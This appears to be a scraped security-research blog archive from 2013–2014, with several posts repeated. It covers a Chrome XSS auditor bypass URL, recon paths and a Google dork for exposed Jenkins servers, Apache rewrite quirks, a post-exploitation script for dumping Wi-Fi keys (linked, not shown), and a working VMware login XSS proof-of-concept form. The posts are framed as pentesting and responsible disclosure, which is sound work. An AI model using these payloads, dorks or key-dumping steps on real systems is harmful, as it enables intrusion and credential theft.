A couple of months ago, I discussed about the existence of configuration flaws in deployment of Jenkins software management application. The details are presented here: Jenkins Configuration Issues. Based on the same benchmark, I reported a few vulnerabilities to BlackBerry in its infrastructure. Recently, I found that they added my name to the responsible disclosure list here: BlackBerry Responsible Disclosure List!.which is fine as long as the team eradicates the vulnerability.
Nowadays, I do not perform aggressive vulnerability hunting (due to my ongoing job) but, when I have time, I dissect components of widely used software and try to find flaws in them. I am more interested in the cases where companies understand the problem and ready to patch it. I am not at all inclined towards finding generic issues in websites which nobody cares about. I always believe that it is important to understand the cons associated with that existing vulnerability when it is reported. It is also crucial to determine how the attacker can chain together a set of bugs to have greater impact. If we don't understand the nitty-gritty details of the vulnerability, there is high chances that the vulnerability will resurface again.
In this case of BlackBerry, unnecessary exposure of Jenkins component in production environment could resulted in problematic scenarios. Exposed components of Jenkins were vulnerable to flaws such as Injections, XSS, etc. So, the belief is: "Expose Less and Be Secure !"
Note: I am going to reveal Frame Injection vulnerability to Jenkins team so that the issue can be patched. No details for now.
Enjoy !
Wednesday, January 01, 2014
Sunday, December 29, 2013
Web Application Design Does Matter - Google Chrome XSS Auditor Bypass : Version <= 32.0.1700.41 m Aura !
Update (6th March 2014) : The post is also discussed on Stack Overflow here: https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms, for additional discussion by the users.
Update: The bug has been reported to Google Chrome team already. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in the test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a state to reveal the details of that panel. Anyways the bug is in Wont Fix state and Google Chrome is still vulnerable to these types of XSS bypasses.
Recently, I encountered an XSS auditor bypass in Google Chrome ( <= 32.0.1700.41 m Aura) while working on my research.
Although, the XSS auditor in Google Chrome is a client-side XSS filter that eradicates the reflective XSS attacks right away. One point that should be taken into consideration that, sometimes the design of the web application also impacts the working of XSS auditor leading to creating such scenarios which are not expected. Anyways, let's analyze a bypass in latest (and earlier) versions of Google Chrome browser. The web page URL looks like as follows:
For Injection, we crafted the URL as follows:
Update: The bug has been reported to Google Chrome team already. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in the test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a state to reveal the details of that panel. Anyways the bug is in Wont Fix state and Google Chrome is still vulnerable to these types of XSS bypasses.
Recently, I encountered an XSS auditor bypass in Google Chrome ( <= 32.0.1700.41 m Aura) while working on my research.
Google Chrome Latest Version Tested ! |
http://www.example.com/index.php?m=login which generates the form as follows:
For Injection, we crafted the URL as follows:
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login .In this injection, we have not injected in "m" parameter rather we have played with the URI structure. The idea is to tweak the form layout rather the value accepted by the "m" parameter. If you place your injection in "m" parameter, it gets nullified by the XSS Auditor. Let's see how the injection occurs:
As a result, Google Chrome XSS auditor is bypassed.
Inference: Few ideas that should be taken into consideration:
1. The design of web applications impact the XSS auditor.
2. Instead of always targeting the HTTP parameters, play around with the URI structure also.
Note: Internet Explorer blocked this vector.
Additional Readings: Check out the inside details of Google Chrome XSS Auditor:
- XSS Auditor Source Code : https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp
- More about XSS Auditor Read here: http://www.collinjackson.com/research/xssauditor.pdf
Enjoy !
Sunday, August 25, 2013
CCTV Cameras : An Interview for Fact or Fictional Show : Revision 3!
Recently, I did an interesting interview with Veronica from Fact or Fictional show on the Internet. We discussed about the issues and technology behind CCTV cameras.
Do not forget to watch the movie on this topic-- "Closed Circuit" ! starring Eric Bana and Rebecca Hall.
Fact or Fiction Source: http://revision3.com/factorfictional/closed-circuit
Protect Your Software Development Web Interfaces - Information Lumps: A Case Study of Jenkins !
Automation of software development
practices through applications has become the defacto standard in the security industry. Organizations
are using support applications to reduce the workload in building and updating
software. The basic idea behind this
post is to check how security is structured for software management applications
such as Jenkins in a real time scenarios and what we need to look into while
performing security assessments. Before discussing further, let's talk about
Jenkins. According to the software website: "Jenkins is an application that monitors executions of repeated jobs,
such as building a software project or jobs run by cron.". For more
details, you can read here: https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins.
From software development perspective, Jenkins provides an
integrated system which developers can use to manage software changes made
to specific projects. It has been noticed that, although organizations use this
software, but misconfigured interfaces (not running inside firewall and
improper access rights) could have substantial impact. From security
perspective, exposure of an integrated system that manages software development
model could become a sensitive risk. To prove this fact, a case study of
Jenkins application is discussed in which it is shown that how misconfigured
and exposed interfaces could result in potential security glitches.
These tests are conducted in an open environment. It has been
found that several of the big companies use Jenkins and with no surprises the
interfaces are exposed and running with improper authentication. In addition to
this, there are numbers of Jenkins systems that are Internet facing and expose
plethora of information to the attackers (remote users). A misconfigured
Jenkins server results in disclosure of critical information that can be used
in different set of attacks. A number of misconfiguration issues are presented
below that result in information disclosure:
Note: Based on this security issues, a few vulnerabilities have been reported to industry leaders (organizations) which have recognized the issue. I will release the details once the issue is patched.
Developers Information: Exposed Jenkins interface
reveals information about the developers participating in the software
projects. It is possible to extract userids of the registered accounts with
associated names. This is a substantial point of gaining information about the
users of a specific organization. An example of the exposed user details is shown below:
Exposed Developers Information ! |
Software
Builds Information and Source Codes: It is possible to gain
information about the software builds without any authentication (misconfigured
scenarios). Information about the
changes in the software over a passage of time reveals information about the
development flow of the components. Jenkins application does not ask for any
explicit permission from the administrators to validate the user before
accessing the ongoing software builds. An
example is shown below:
Exposed Software Build and Version numbers ! |
In
certain scenarios, it is also possible to download the source code from the
Jenkins without any authentication. Although for making changes to the code,
you require credentials but the fun part is you can download code without them.
Take a look at the example shown below:
Source Code Files ! |
Server-side Information Disclosure in Environment Variables: Access
to environment variables also provides plethora of information. Example
presented below shows the significant information about the configure MySQL
(JDBC) database server. The attacker can easily glean username and password of
the database (SONAR_JDBC_USERNAME & SONAR_JDBC_PASSWORD) including the
internal IP address with port number on which JDBC service is running.
Revealed Environment Information ! |
Exposure of Application Secret Data: During analysis, it has been found that a
number of server side scripts have hard coded critical information such as
secret-keys and credentials which can be exposed when console-output operations
are performed. The underlined example shows how a secret key is extracted by
accessing the console-output. In this
example, the curl command uses a secret key to connect to a specific domain for
fetching JSON data through GET request. Once this information is exposed, the
attacker can directly perform queries with the target domain.
Revealed Secret Key ! |
Cron Jobs Execution: It is also possible to start the cron jobs which
reveal plethora of information due to the usage of debugging calls. The
majority of the time cron jobs produce a heck lot of output showing the success
of running software. The example shown below presents the creation of database
by a specific cron job in one of the vulnerable Jenkins configuration. It reveals
how the table of OAUTH tokens is created and index is generated.
Information Leakage through Cron Jobs ! |
Information Disclosure in
Debug Errors: During a
quick check in certain Jenkins configurations, it has been noticed that the
Jenkins server does not handle the requests to restricted resources in a secure
manner. The attacker can perform additional steps to request access to restricted
resources to generated debug errors as shown below:
Information Disclosure in DEBUG Errors ! |
Some of the standard requests specific to Jenkins are shown below:
- For verifying whether anonymous access is allowed or not in Jenkins, the link can be fetched as: http://www.example.com/pview/
- To retrieve the system information, the attacker can try for: http://www.example.com/systeminf
- For accessing the script interface (command line access), one can try for: http://www.example.com/script
- To retrieve the Jenkins account signup webpage: http://www.example.com/signup
- For creating account, send a direct request to:http://www.example.com/securityRealm/createAccount
Explicit CSRF Protection: It is always a good practice to analyze the
design of the application from security standards. Some security standards
should be deployed in the application by default. For example: - Jenkins
provides a global security option in which protection against CSRF attacks have
to be explicitly checked. If this option is not checked, the Jenkins
application fails to deploy the protection globally. During our analysis, it
has been noticed a number of Jenkins systems are running without CSRF
protection which makes them vulnerable to critical web attacks.
Explicit Security Configuration ! |
SSH Endpoint Disclosure: Jenkins implements a SSH random port feature in
which the software randomize the port selection for running SSH service.
Typically, when a client sends a GET request, Jenkins replies back with
"X-SSH-Endpoint" HTTP header which leverages the information in the
form of host: port. It means SSH service is listening on following host with
given port number. If the system is already exposed on the Internet, the
attacker can easily glean information about the port number on which SSH server
is listening. A real time example of a server running Jenkins is shown below:
SSH Endpoint Disclosure ! |
This information discussed in this post only provides a glimpse of
security risks associated with the poorly administered software managing
applications. These applications can provide a potential beef for the attackers
to gain substantial amount of information about the organization and server
side environment which facilitates the additional attacks.
For replicating the issues, trigger
Google dork as: intitle: "Dashboard [Jenkins]" for getting a
list of Jenkins server available on the Internet.
Impacts: As shown above, the misconfigured software management applications can have
severe impacts as discussed below:
- Information about developers can be used to conduct Phishing attacks including social engineering trickery to launch targeted attacks.
- A common mistake for not enabling the CSRF protection exposes the Jenkins environment to number of critical web vulnerabilities such as Cross-site File uploading.
- In appropriate error handling discloses information about the different stack traces and internal components of the software.
- Unrestricted cron jobs will result in successful running of different builds of the software. As shown above, information disclosed in the console output results in leakage of sensitive data such as secret keys. The attacker can use the secret keys to attack target servers.
- Disclosure of software build information provides an attacker with a complete knowledge of the updates and modification that have taken place in the software. This information is beneficial for hunting security vulnerabilities or design analysis.
Recommendations:
- For software development and management interfaces, restrict the access completely. It is highly recommended that the server should be configured with complete authentication. It means no functionality of the application should be allowed to be accessed without authentication or in a default state.
- Simply removing the HTTP links from interfaces is not a robust way to restrict access. The links can be fuzzed easily to gain access to hidden functionality. Deploy security features using a global configuration.
- Standard security protection mechanism should be enabled by default without asking any preferences from the users or administrators.
- Administrator should verify the new account creation in software like Jenkins before an access is granted to the registered user.
Configure Well and Be Secure!
Sunday, August 04, 2013
BlackHat USA Arsenal 2013 : Sparty - A FrontPage and SharePoint Security Auditing Tool
Last week, I released the first version of Sparty tool at BlackHat USA Arsenal 2013. The tool helps the penetration testers to check standard security flaws in the deployment of FrontPage and SharePoint web software. The tool is an outcome of the security issues that have been found on the wide deployments of these web software.
I had an interesting discussion with Tom Gallagher from Microsoft who worked on the FrontPage and SharePoint security and related developments. I got very good feedback which I will incorporate in the next feature. Gursev also provided some impressive points which I will work on.
Sparty is hosted here : http://sparty.secniche.org/
Enjoy and feel free to provide any feedback.
I had an interesting discussion with Tom Gallagher from Microsoft who worked on the FrontPage and SharePoint security and related developments. I got very good feedback which I will incorporate in the next feature. Gursev also provided some impressive points which I will work on.
Sparty is hosted here : http://sparty.secniche.org/
Enjoy and feel free to provide any feedback.
Wednesday, July 17, 2013
Internal IP Address Disclosure over HTTP Protocol Channel : Information Revealing Headers !
The disclosure of internal IP addresses to remote users reveals a substantial layout of the organizational network. It is highly advised that the web servers should not disclose internal IP addresses in the HTTP response headers. In a real time scenarios, this is not the case. The majority of web servers, load balancing devices and web applications disclose this information. This post simply discusses the different ways through which internal IP addresses are revealed over HTTP protocol.
You can read more about HTTP 1.1 specifications and working here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
1. Location Response-Header Field: This response header is basically used for redirecting the HTTP request to a new location. It results in 201 response code when resource is dynamically created during the request. The 3xx (redirection 301, 302, 303, 304, 305, 306, 307) response value shows that location is predetermined by the web server and is the preferred one.
2. Content-Location: Similarly, Content-Location response header also discloses the internal IP address. This header presents a location of the resource when it is accessible on a separate URI in addition to the HTTP request. There is a potential issue in IIS web servers which reveal internal IP address in Content-Location header while redirecting the browser. More details can be read here: http://www.rapid7.com/vulndb/lookup/http-iis-0065
There is a difference between in the usage of Location and Content-Location HTTP response headers. For reference, you can read this blog entry: http://www.subbu.org/blog/2008/10/location-vs-content-location.
3. Via Header Field: This HTTP response is header is distributed by gateways and proxies present between the client (user agents - browsers) and the web server. The basic functionality of Via header field is to track message forwarding, avoid loops during processing and identifying protocol capabilities. Generally, this header reveals the internal IP address of the configured gateway or proxy as shown below:
4. X-Cache Header: This response header is thrown by transparent proxies deployed as an intermediate agent between the client and server. The idea is to simply reduce the direct load on the website by placing a copy in the cache and responding with the same when HTTP request is initiated by the client. There are other functionalities associated with transparent proxies also. The internal IP address can be revealed in two scenarios as discussed below:
4.1 X-Cache Miss: When the transparent proxy does not have a local copy of the website or web pages requested by the client.
4.2 X- Cache Hit: When the transparent proxy has a local copy of the website or requested web pages.
You can read more about the X-Cache headers here: http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/
5. Set-Cookie Header: A number of load balancing devices use Set-Cookie for setting custom content as a part of communication channel to activate the session with the backend web server. The internal IP address can also be disclosed as a part of Set-Cookie parameter. A simple example is the BIG IP devices which basically reveal the internal IP address in binary encoded form. Be default, it is the functionality of BIG IP devices to handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of internal IP address
In my earlier presentations (couple of years ago), I talked about extracting the IP address from the BIG IP http_pool Set-Cookie parameter. The concept is shown below.
These are the some of the HTTP headers over which internal IP is exposed. While deployment, one should verify and validate that these headers should not expose unnecessary information.
Note: If anyone has additional information regarding Internal IP address disclosure over HTTP channel, let me know and I will update this entry. The idea is to collect all the metrics.
Enjoy!
You can read more about HTTP 1.1 specifications and working here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
1. Location Response-Header Field: This response header is basically used for redirecting the HTTP request to a new location. It results in 201 response code when resource is dynamically created during the request. The 3xx (redirection 301, 302, 303, 304, 305, 306, 307) response value shows that location is predetermined by the web server and is the preferred one.
2. Content-Location: Similarly, Content-Location response header also discloses the internal IP address. This header presents a location of the resource when it is accessible on a separate URI in addition to the HTTP request. There is a potential issue in IIS web servers which reveal internal IP address in Content-Location header while redirecting the browser. More details can be read here: http://www.rapid7.com/vulndb/lookup/http-iis-0065
There is a difference between in the usage of Location and Content-Location HTTP response headers. For reference, you can read this blog entry: http://www.subbu.org/blog/2008/10/location-vs-content-location.
3. Via Header Field: This HTTP response is header is distributed by gateways and proxies present between the client (user agents - browsers) and the web server. The basic functionality of Via header field is to track message forwarding, avoid loops during processing and identifying protocol capabilities. Generally, this header reveals the internal IP address of the configured gateway or proxy as shown below:
4. X-Cache Header: This response header is thrown by transparent proxies deployed as an intermediate agent between the client and server. The idea is to simply reduce the direct load on the website by placing a copy in the cache and responding with the same when HTTP request is initiated by the client. There are other functionalities associated with transparent proxies also. The internal IP address can be revealed in two scenarios as discussed below:
4.1 X-Cache Miss: When the transparent proxy does not have a local copy of the website or web pages requested by the client.
4.2 X- Cache Hit: When the transparent proxy has a local copy of the website or requested web pages.
You can read more about the X-Cache headers here: http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/
5. Set-Cookie Header: A number of load balancing devices use Set-Cookie for setting custom content as a part of communication channel to activate the session with the backend web server. The internal IP address can also be disclosed as a part of Set-Cookie parameter. A simple example is the BIG IP devices which basically reveal the internal IP address in binary encoded form. Be default, it is the functionality of BIG IP devices to handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of internal IP address
These are the some of the HTTP headers over which internal IP is exposed. While deployment, one should verify and validate that these headers should not expose unnecessary information.
Note: If anyone has additional information regarding Internal IP address disclosure over HTTP channel, let me know and I will update this entry. The idea is to collect all the metrics.
Enjoy!
Labels:
Big IP,
HTTP Protocol,
Internal IP Disclosure,
Set-Cookie,
Via,
X-Cache Hit,
X-Cache Miss
Monday, May 20, 2013
Contrarisk Security Podcast Series: A Talk on Socioware!
I recently did a podcast on the Socioware with Steve from Contrarisk.
"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."
Listen to the podcast here: http://contrarisk.com/2013/05/19/csp-0011/
Saturday, May 04, 2013
ToorCon 14 (2012) : Malandroid - The Crux of Android Infections
Talk that I gave on Android malware at Toorcon 14.
Labels:
Android Malware,
Chinese Malware,
Mobile Bots,
Mobile Malware,
ToorCon
Saturday, April 27, 2013
(Pentest Apache #3) - The Nature of # (%23) Character | Mod Security Rules in Apache
1. (Pentest Apache #1) Exposed Apache Axis - SOAP Objects
2. (Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security
In this post, I want to discuss an interesting issue that occurs due to misconfigured rules in modsecurity. It is not a severe issue but it helps the penetration tester to gain some additional information about the server-side environment. For example:- directory listing.
In modsecurity, NE is stated as No Escape. One can explicitly configure the rules with this flag to implement no escaping. For example: "#" will be converted to "%23" if NE flag is not set. If NE flag is set , the "#" character is treated as such and processed accordingly. For more about modsecurity flags, refer here: http://httpd.apache.org/docs/2.2/rewrite/flags.html. An example taken from there:
"RewriteRule ^/anchor/(.+) /bigpage.html#$1 [NE,R]. This example will redirect /anchor/xyz to /bigpage.html#xyz."
If escaping is not set properly in addition to some misconfiguration issue, it could result in unexpected behavior. I have noticed this flaw plethora of times during a number of security assessments. Let's have a look at one of the real time example:-
URL pattern 1: http://www.example.com/temp/#htaccess.cl
URL pattern 2: http://www.example.com/temp/%23htaccess.cl
In case (1), if NE flag is set, the URL has to be processed with "#" character. In case (2), if NE flag is not set, the URL has to be processed with "%23", hexadecimal notation of the character "#". But due to misconfiguration, the behavior changes.
The tested server is : Apache/2.2.14. Actually, both URLs are responded with 200 OK responses. In case (1), the output results in directory listing. In case (2), the output results in content of the file htaccess.cl.
Case 1: Content-Type is text/html;charset=UTF-8
With # Character |
With %23 Character |
It could be a one reason that file name starts with "#" character. But, the primary reason is the inability of Apache to understand misconfigured URL rewriting rules. Usually, if the URL rewriting rule fails, the web server should respond in 404 error message. In case of misconfiguration, the fall back step is the directory listing, atleast that what I have seen in practical scenarios (it could be different).
Inference: Play around with URL rewriting rules to detect bypasses which could result in gleaning additional information.
Tuesday, April 09, 2013
A Sweet Script to Dump Keys from Wlan Profiles - Post Exploitation (or Regular Use)
Update: Just found that PaulDotCom has written over this blog post in episode 327: http://pauldotcom.com/wiki/index.php/Episode327.
"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."
After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small automation is productive. Running a same command several times is not bad but its better to take a next step.
The below presented script helps to dump security keys for all the wlan profiles present on the compromised system (if you have an administrator access). I use this sweet script to do the work so use it when ever you want.
"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."
After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small automation is productive. Running a same command several times is not bad but its better to take a next step.
The below presented script helps to dump security keys for all the wlan profiles present on the compromised system (if you have an administrator access). I use this sweet script to do the work so use it when ever you want.
Wlan Profiles - Security Keys Dumping Script
It outputs as:
Fetch the batch script from here: http://www.secniche.org/tools/dump_wlan_config.txt
Enjoy !
|
Labels:
Hacking,
Wireless Keys,
Wlan keys dumping
Tuesday, March 26, 2013
Responsible Disclosure : XSS in Damballa Reported and Patched !
Last weekend, I was reading some research papers available at Damballa website which are awesome without any doubt. I was surfing the website and to surprise, I found an XSS vulnerability in the website. Since, the Damballa provides anti malware solutions, XSS can be used for malicious purposes. Under responsible disclosure constraints, I contacted David Holmes of Damballa and revealed the issue. What makes a responsible disclosure interesting is the prompt reply from the vendor who is willing to patch the vulnerability without any complexities. The same happened with Damballa. They patched the bug right away. In addition, I had a good discussions with David Holmes why the issue persisted in the website.
I expect that every vendor should be prompt enough to patch the issue.
Proof-of-Concept (PoC):
Be responsible in disclosing bugs.
I expect that every vendor should be prompt enough to patch the issue.
Proof-of-Concept (PoC):
Be responsible in disclosing bugs.
Labels:
Damballa Inc,
Responsible Disclosure,
XSS
Sunday, January 27, 2013
VMware Management Interface - A Little Story of XSS
As a part of my open research, I came across an XSS vulnerability in VMware management interface which is used by VMware ESX and GSX server. I thought it might be a new issue but interestingly a number of XSS issues have already been reported to VMware security team. The list can be found here: http://www.cvedetails.com/vulnerability-list/vendor_id-252/opxss-1/Vmware.html
On the other note, a number of VMware management interfaces exposed on the Internet are still vulnerable. Of-course, the administrators have not deployed patches or upgraded the required software. I din't get enough details on the XSS issue (may be I missed it). So, I thought to talk about the issue in detail here. I am not going to list which versions are affected, you can get that information in the advisories. I will talk about the issue. The management interface look like as presented below:
VMware Management Interface |
The username and password field are provided with ids as "l" and "m" respectively. Interestingly, the vulnerable interfaces use client side encoding to obfuscate the input values entered by the user. But, this can be taken care while using proxy, the value can be directly passed without encoding (alter the HTTP request and POST parameters in the proxy such as BURP, Charles, etc). For example:- if you specify the parameters as follows:
l="/>"/>"/><script>alert(document.cookie);</script>
m=test
it gets encoded as follows:
l = Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
m = dGVzdA==
Well, its not a complex encoding but only a Base 64 encoding. Even if, one uses the proxy to pass the values without encoding, due to client side work, the XSS payload fails to render in the webpage. The output looks like as follows:
<html><head><title>Login: VMware Management Interface</title><script> var user="Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
It reflects back our XSS payload but in Base 64 encoded format which is rendered as useless data. The vulnerability persisted in the handling of these parameters on the server side. If you check, the same payload is reflected back without any additional modification. Actually, the server does not perform any encoding or input validation. Its all client side. The idea is to simply render this payload without encoding. All the POST requests are handled by the /sx-login/index.pl. Let's see:
(Request-Line) POST /sx-login/index.pl HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://82.133.251.1/vmware/en/login.html
Cookie: vmware.mui.test=1; vmware.mui.test=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
The simple proof of concept (PoC) that directly sends request to the /sx/login/index.pl is shown below which queries directly without any encoding and made the XSS work.
<html>
<body>
<form name="k" id="k" method="post" action="https://example.com/sx-login/index.pl" target="data">
<input name="l" type="text" value='"--></style></script><script>alert(document.location);</script>"'/>
<input name="m" type="password" value="test"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
Once this form is successfully submitted, it results in XSS as shown below:
<html><head><title>Login: VMware Management Interface</title><script>
var user=""--></style></script><script>alert(document.location);</script>"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
On patched systems, the web server replied back as follows:
<html><head><title>Login: VMware Management Interface</title><script>
The patched versions are now using server side unicode encoding to subvert the XSS payload.
Enjoy!
l="/>"/>"/><script>alert(document.cookie);</script>
m=test
it gets encoded as follows:
l = Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
m = dGVzdA==
Well, its not a complex encoding but only a Base 64 encoding. Even if, one uses the proxy to pass the values without encoding, due to client side work, the XSS payload fails to render in the webpage. The output looks like as follows:
<html><head><title>Login: VMware Management Interface</title><script> var user="Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
It reflects back our XSS payload but in Base 64 encoded format which is rendered as useless data. The vulnerability persisted in the handling of these parameters on the server side. If you check, the same payload is reflected back without any additional modification. Actually, the server does not perform any encoding or input validation. Its all client side. The idea is to simply render this payload without encoding. All the POST requests are handled by the /sx-login/index.pl. Let's see:
(Request-Line) POST /sx-login/index.pl HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://82.133.251.1/vmware/en/login.html
Cookie: vmware.mui.test=1; vmware.mui.test=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
The simple proof of concept (PoC) that directly sends request to the /sx/login/index.pl is shown below which queries directly without any encoding and made the XSS work.
<html>
<body>
<form name="k" id="k" method="post" action="https://example.com/sx-login/index.pl" target="data">
<input name="l" type="text" value='"--></style></script><script>alert(document.location);</script>"'/>
<input name="m" type="password" value="test"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
Once this form is successfully submitted, it results in XSS as shown below:
<html><head><title>Login: VMware Management Interface</title><script>
var user=""--></style></script><script>alert(document.location);</script>"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
Successful XSS Injection |
<html><head><title>Login: VMware Management Interface</title><script>
var user="\"--\u003E\u003C/style\u003E\u003C/script\u003E\u003Cscript\u003Ealert(document.location);\u003C/script\u003E\"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null; </script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
The patched versions are now using server side unicode encoding to subvert the XSS payload.
Enjoy!
Labels:
Vmware ESX,
VMware GSX,
VMware Security,
XSS